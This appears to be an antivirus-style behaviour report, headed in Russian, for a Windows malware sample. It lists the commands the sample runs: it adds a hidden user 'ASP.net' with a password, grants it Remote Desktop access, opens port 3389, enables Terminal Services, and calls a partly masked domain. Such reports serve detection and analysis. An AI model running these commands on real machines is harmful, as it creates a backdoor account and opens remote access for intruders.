Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
- <SYSTEM32>\net1.exe user ASP.net iPhone!@# /add
- <SYSTEM32>\netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" ASP.net /add
- <SYSTEM32>\net1.exe localgroup %USERNAME%s ASP.net /add
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
- <SYSTEM32>\net1.exe start TermService
- <SYSTEM32>\sc.exe config TermService start= auto
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\movies[1].php
- %TEMP%\~1.bat
- %TEMP%\~1.bat
- %TEMP%\~1.bat
- 'www.ro####bowers.com':80
- 'localhost':1036
- www.ro####bowers.com/movies.php
- DNS ASK www.ro####bowers.com
- '10.#.1.1':1037
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''